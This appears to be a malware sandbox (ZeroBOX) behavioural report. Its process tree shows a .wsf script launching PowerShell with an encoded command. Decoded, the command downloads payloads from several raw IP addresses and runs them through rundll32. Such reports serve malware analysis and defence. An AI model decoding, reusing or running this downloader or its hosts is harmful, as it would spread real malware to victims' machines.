popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\ve_April.1(2947).wsf

    3036

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAdQBuAGQAZQByAHcAcgBpAHQAVABoAGEAbABhAHMAcwBpAGMAYQBsACAAPQAgACgAIgBoAHQAdABwADoALwAvADUAMQAuADIAMgAyAC4AMQA5ADkALgAyADQANAAvADAAOABCAHEAVABDAC4AZABhAHQALABoAHQAdABwADoALwAvADEANAA5AC4AMQAwADIALgAyADQAMwAuADIAMAA0AC8AMQBzAFgAaABmAE0ALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADIAMgAxAC4AMQAyADQALwBPADcAdABqAHcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgA2AC4AMgA0ADgALgAxADgANwAvAGMAWQBGAFcATgBRAEkATwBWAC4AZABhAHQALABoAHQAdABwADoALwAvADgANwAuADIAMwA2AC4AMQA0ADYALgAzADQALwBLAGwANABMAGwAQgB4AHoASwBaAFcANQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA0ADUALgAxADUAOQAuADIANAA5AC4AMwAzAC8AMgBCAEMAZwB2ADIALgBkAGEAdAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAG8AcAByAG8AcABoAGEAZwBpAHMAdAAgAGkAbgAgACQAdQBuAGQAZQByAHcAcgBpAHQAVABoAGEAbABhAHMAcwBpAGMAYQBsACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABDAG8AcAByAG8AcABoAGEAZwBpAHMAdAAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANwAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAVQBwAGwAaQBuAGsAaQBuAGcALgBVAG4AZAByAG8AcABwAGUAZAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAcABsAGkAbgBrAGkAbgBnAC4AVQBuAGQAcgBvAHAAcABlAGQAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAAxADAAMAAwADAAMAApACAAewBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAVQBwAGwAaQBuAGsAaQBuAGcALgBVAG4AZAByAG8AcABwAGUAZAAsAE4AaQBrAG4AOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADsAfQB9AA=="

      2200

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf